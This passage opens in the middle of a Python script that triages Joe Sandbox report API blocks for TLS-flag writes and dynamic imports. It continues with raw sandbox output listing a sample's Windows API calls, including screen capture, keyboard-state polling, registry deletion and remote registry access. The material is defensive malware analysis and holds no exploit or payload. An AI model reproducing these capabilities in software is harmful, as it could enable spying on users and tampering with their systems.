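            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            current.append(Call(m["name"], m["module"], args, int(m["ref"], 16), sub))
        elif not stripped.startswith("•"):
            current = None  # 'Strings', 'Memory Dump Source', ... end the block
    return blocks


def decode_security_flags(value: Arg) -> str:
    """Name the SECURITY_FLAG_* bits of a DWORD; non-numeric slots are 'unresolved'."""
    if not isinstance(value, int):
        return "unresolved"
    names = [n for bit, n in SECURITY_FLAGS.items() if value & bit]
    return "|".join(names) if names else f"0x{value:X}"


def triage(calls: List[Call]) -> List[Tuple[int, str, str]]:
    """Flag call patterns worth a second look, as (ref, tag, detail)."""
    out: List[Tuple[int, str, str]] = []
    for c in calls:
        a = c.args
        if c.name.startswith("InternetSetOption") and len(a) > 2 and a[1] == INTERNET_OPTION_SECURITY_FLAGS:
            # Caveat: Joe prints the raw stack slot, and lpBuffer is normally a pointer to
            # the DWORD, so this decoding is a hypothesis to confirm in the memory dump.
            out.append((c.ref, "tls-flags", "SECURITY_FLAGS written; lpBuffer slot decodes as " + decode_security_flags(a[2])))
        if c.name.startswith("LoadLibrary") and a and isinstance(a[0], str):
            out.append((c.ref, "loads-dll", a[0]))
        if c.name == "GetProcAddress" and len(a) > 1 and isinstance(a[1], str):
            out.append((c.ref, "dynamic-import", a[1]))
    return out


# Two 'APIs' blocks copied from the report entries above (WinINet request, registry
# deletion), each followed by the section header that closes it in the report.
SAMPLE = """APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002DCEF5
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 002DCF78
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002DCF8E
Strings
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 002EC352
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002EC364
• RegDeleteKeyW.ADVAPI32(?,?), ref: 002EC382
Similarity
"""

if __name__ == "__main__":
    for i, block in enumerate(parse_blocks(SAMPLE)):
        print(i, [f"{r:08X} {t}: {d}" for r, t, d in triage(block)])
```

Run it on the full report text (the indentation and 'Part of subcall' sub-bullets are handled) to get one finding list per function; anything tagged tls-flags should then be checked against the dump at the quoted ref before it is written up as a TLS-validation weakness.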
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 002FA990
                                                                                                                                                                        • GetSystemMetrics.USER32(00000011), ref: 002FA9A7
                                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 002FA9B3
                                                                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 002FA9C9
                                                                                                                                                                        • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 002FAC15
                                                                                                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002FAC33
                                                                                                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002FAC54
                                                                                                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 002FAC73
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 002FAC95
                                                                                                                                                                        • DefDlgProcW.USER32(?,00000005,?), ref: 002FACBB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
• String ID: @$(3
• API String ID: 3962739598-2244231450
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002F97B6
• GetFocus.USER32 ref: 002F97C6
• GetDlgCtrlID.USER32(00000000), ref: 002F97D1
• DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 002F9879
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002F992B
• GetMenuItemCount.USER32(?), ref: 002F9948
• GetMenuItemID.USER32(?,00000000), ref: 002F9958
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002F998A
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002F99CC
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002F99FD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
• String ID: 0$(3
• API String ID: 1026556194-1772917041
APIs
• GetDC.USER32(00000000), ref: 002E3035
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 002E3045
• CreateCompatibleDC.GDI32(?), ref: 002E3051
• SelectObject.GDI32(00000000,?), ref: 002E305E
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002E30CA
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 002E3109
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 002E312D
• SelectObject.GDI32(?,?), ref: 002E3135
• DeleteObject.GDI32(?), ref: 002E313E
• DeleteDC.GDI32(?), ref: 002E3145
• ReleaseDC.USER32(00000000,?), ref: 002E3150
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 002C52E6
• GetWindowTextW.USER32(?,?,00000400), ref: 002C5328
• _wcslen.LIBCMT ref: 002C5339
• CharUpperBuffW.USER32(?,00000000), ref: 002C5345
• _wcsstr.LIBVCRUNTIME ref: 002C537A
• GetClassNameW.USER32(00000018,?,00000400), ref: 002C53B2
• GetWindowTextW.USER32(?,?,00000400), ref: 002C53EB
• GetClassNameW.USER32(00000018,?,00000400), ref: 002C5445
• GetClassNameW.USER32(?,?,00000400), ref: 002C5477
• GetWindowRect.USER32(?,?), ref: 002C54EF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
• String ID: ThumbnailClass
• API String ID: 1311036022-1241985126
APIs
• GetMenuItemInfoW.USER32(003329C0,000000FF,00000000,00000030), ref: 002CC973
• SetMenuItemInfoW.USER32(003329C0,00000004,00000000,00000030), ref: 002CC9A8
• Sleep.KERNEL32(000001F4), ref: 002CC9BA
• GetMenuItemCount.USER32(?), ref: 002CCA00
• GetMenuItemID.USER32(?,00000000), ref: 002CCA1D
• GetMenuItemID.USER32(?,-00000001), ref: 002CCA49
• GetMenuItemID.USER32(?,?), ref: 002CCA90
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002CCAD6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002CCAEB
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002CCB0C
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: 0
• API String ID: 1460738036-4108050209
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 002CE4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002CE4FA
• _wcslen.LIBCMT ref: 002CE504
• _wcsstr.LIBVCRUNTIME ref: 002CE554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002CE570
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                        • API String ID: 1939486746-1459072770
                                                                                                                                                                        • Opcode ID: be4104ef07bdb44e6682899fbc478009edead2e80e9e54f63de8dafda021ecac
                                                                                                                                                                        • Instruction ID: 4d9a4966c7e9e90eb0580ecf255ed92e105d56e781a5399819302166b92b66fa
                                                                                                                                                                        • Opcode Fuzzy Hash: be4104ef07bdb44e6682899fbc478009edead2e80e9e54f63de8dafda021ecac
                                                                                                                                                                        • Instruction Fuzzy Hash: E54146766212187BDF01BB649C4BFBF77ACDF51360F10016AF904A61C2EB749A309BA4
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 002ED6C4
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 002ED6ED
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 002ED7A8
                                                                                                                                                                          • Part of subcall function 002ED694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 002ED70A
                                                                                                                                                                          • Part of subcall function 002ED694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 002ED71D
                                                                                                                                                                          • Part of subcall function 002ED694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002ED72F
                                                                                                                                                                          • Part of subcall function 002ED694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 002ED765
                                                                                                                                                                          • Part of subcall function 002ED694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 002ED788
                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 002ED753
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                                                                        • Opcode ID: 147336243531d3e35fc50b0c448bed3d97fe7c17d86ba41c10563a6fbdbcb74d
                                                                                                                                                                        • Instruction ID: de4e2d271a510b74486f2dbc8789de5155b246cf4c82199c1d35e839dab121c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 147336243531d3e35fc50b0c448bed3d97fe7c17d86ba41c10563a6fbdbcb74d
                                                                                                                                                                        • Instruction Fuzzy Hash: 70318C76A51129BBDB219F92EC88EFFBB7DEF46790F400065E805E2140DA709E45DAA0
                                                                                                                                                                        APIs
                                                                                                                                                                        • timeGetTime.WINMM ref: 002CEFCB
                                                                                                                                                                          • Part of subcall function 0027F215: timeGetTime.WINMM(?,?,002CEFEB), ref: 0027F219
                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 002CEFF8
                                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 002CF01C
                                                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 002CF03E
                                                                                                                                                                        • SetActiveWindow.USER32 ref: 002CF05D
                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002CF06B
                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 002CF08A
                                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 002CF095
                                                                                                                                                                        • IsWindow.USER32 ref: 002CF0A1
                                                                                                                                                                        • EndDialog.USER32(00000000), ref: 002CF0B2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                                        • Opcode ID: edb49df67dd1cfdb850f47f36be5dc555ac81d0c9198a25bdc8730b39b15003d
                                                                                                                                                                        • Instruction ID: bd5dbbba8d7c3b18977d4a14296fc07a2c9b60dbfe004ae13895fdb5f87d779d
                                                                                                                                                                        • Opcode Fuzzy Hash: edb49df67dd1cfdb850f47f36be5dc555ac81d0c9198a25bdc8730b39b15003d
                                                                                                                                                                        • Instruction Fuzzy Hash: E6217C75510605BFE7126F20BCCAF26BB6EFB49BA4F004138F50582272DB759C64CA51
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002CF374
                                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002CF38A
                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002CF39B
                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002CF3AD
                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002CF3BE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                                                        • Opcode ID: 20158ab9de014d435f18b1c28732809f54acb807f395812b58f00ecf79dd4139
                                                                                                                                                                        • Instruction ID: 53fad1a6608680348efb041817ec7880ab3d029bda41dfd550b262d07994a85d
                                                                                                                                                                        • Opcode Fuzzy Hash: 20158ab9de014d435f18b1c28732809f54acb807f395812b58f00ecf79dd4139
                                                                                                                                                                        • Instruction Fuzzy Hash: E611E331A602A979D721B761AC4AEFF6A7CEBD2B40F000569B401E30D0DBA01994C9B0
                                                                                                                                                                        APIs
                                                                                                                                                                        • _free.LIBCMT ref: 00293007
                                                                                                                                                                          • Part of subcall function 00292D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4), ref: 00292D4E
                                                                                                                                                                          • Part of subcall function 00292D38: GetLastError.KERNEL32(00331DC4,?,0029DB51,00331DC4,00000000,00331DC4,00000000,?,0029DB78,00331DC4,00000007,00331DC4,?,0029DF75,00331DC4,00331DC4), ref: 00292D60
                                                                                                                                                                        • _free.LIBCMT ref: 00293013
                                                                                                                                                                        • _free.LIBCMT ref: 0029301E
                                                                                                                                                                        • _free.LIBCMT ref: 00293029
                                                                                                                                                                        • _free.LIBCMT ref: 00293034
                                                                                                                                                                        • _free.LIBCMT ref: 0029303F
                                                                                                                                                                        • _free.LIBCMT ref: 0029304A
                                                                                                                                                                        • _free.LIBCMT ref: 00293055
                                                                                                                                                                        • _free.LIBCMT ref: 00293060
                                                                                                                                                                        • _free.LIBCMT ref: 0029306E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                        • String ID: &0
                                                                                                                                                                        • API String ID: 776569668-20326164
                                                                                                                                                                        • Opcode ID: e383cae58d97b783d94b02c6a8fdeffe5945228fd21033dbca022a7cb114a93a
                                                                                                                                                                        • Instruction ID: 493a3ac7ed6997626f46d7638e8d932e5c808a3e410d4126fc23444f358bbc54
                                                                                                                                                                        • Opcode Fuzzy Hash: e383cae58d97b783d94b02c6a8fdeffe5945228fd21033dbca022a7cb114a93a
                                                                                                                                                                        • Instruction Fuzzy Hash: 92117476520108FFCF01EF94C942DDD3BA5EF05354B9145A5FA089B222DA32EB659FA0
APIs
• GetKeyboardState.USER32(?), ref: 002CA9D9
• SetKeyboardState.USER32(?), ref: 002CAA44
• GetAsyncKeyState.USER32(000000A0), ref: 002CAA64
• GetKeyState.USER32(000000A0), ref: 002CAA7B
• GetAsyncKeyState.USER32(000000A1), ref: 002CAAAA
• GetKeyState.USER32(000000A1), ref: 002CAABB
• GetAsyncKeyState.USER32(00000011), ref: 002CAAE7
• GetKeyState.USER32(00000011), ref: 002CAAF5
• GetAsyncKeyState.USER32(00000012), ref: 002CAB1E
• GetKeyState.USER32(00000012), ref: 002CAB2C
• GetAsyncKeyState.USER32(0000005B), ref: 002CAB55
• GetKeyState.USER32(0000005B), ref: 002CAB63
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
APIs
• GetDlgItem.USER32(?,00000001), ref: 002C6649
• GetWindowRect.USER32(00000000,?), ref: 002C6662
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 002C66C0
• GetDlgItem.USER32(?,00000002), ref: 002C66D0
• GetWindowRect.USER32(00000000,?), ref: 002C66E2
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 002C6736
• GetDlgItem.USER32(?,000003E9), ref: 002C6744
• GetWindowRect.USER32(00000000,?), ref: 002C6756
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 002C6798
• GetDlgItem.USER32(?,000003EA), ref: 002C67AB
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002C67C1
• InvalidateRect.USER32(?,00000000,00000001), ref: 002C67CE
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
APIs
  • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
• GetSysColor.USER32(0000000F), ref: 00262152
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
APIs
• LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002A28D1
• ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002A28EA
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002A28FA
• ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002A2912
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002A2933
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002611F5,00000000,00000000,00000000,000000FF,00000000), ref: 002A2942
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002A295F
• DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,002611F5,00000000,00000000,00000000,000000FF,00000000), ref: 002A296E
Strings
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID: (3
• API String ID: 1268354404-113007392
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
  • Part of subcall function 002619CD: GetCursorPos.USER32(?), ref: 002619E1
  • Part of subcall function 002619CD: ScreenToClient.USER32(00000000,?), ref: 002619FE
  • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000001), ref: 00261A23
  • Part of subcall function 002619CD: GetAsyncKeyState.USER32(00000002), ref: 00261A3D
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002F95C7
• ImageList_EndDrag.COMCTL32 ref: 002F95CD
• ReleaseCapture.USER32 ref: 002F95D3
• SetWindowTextW.USER32(?,00000000), ref: 002F966E
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002F9681
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 002F975B
Strings
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID$(3$(3
• API String ID: 1924731296-4147361190
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,002B0D31,00000001,0000138C,00000001,00000000,00000001,?,002DEEAE,00332430), ref: 002CA091
• LoadStringW.USER32(00000000,?,002B0D31,00000001), ref: 002CA09A
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
• GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,002B0D31,00000001,0000138C,00000001,00000000,00000001,?,002DEEAE,00332430,?), ref: 002CA0BC
• LoadStringW.USER32(00000000,?,002B0D31,00000001), ref: 002CA0BF
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 002CA1E0
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                                                                        • Opcode ID: d7f339609a487f1fd4f6356df8f54e42e16301a2d34c67f9cc7f05ec87a2b17c
                                                                                                                                                                        • Instruction ID: 684c8a35d8e01da08a94ff77a46be9cdb519a84eff2d6e856c1fcea081f32ce7
                                                                                                                                                                        • Opcode Fuzzy Hash: d7f339609a487f1fd4f6356df8f54e42e16301a2d34c67f9cc7f05ec87a2b17c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2841707281011DAACB05FBE0DD86EEEB778AF18344F500165F505B2092EB756FA9CF61
APIs
  • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002C1093
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002C10AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002C10CB
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002C10F5
• CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 002C111D
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C1128
• RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002C112D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
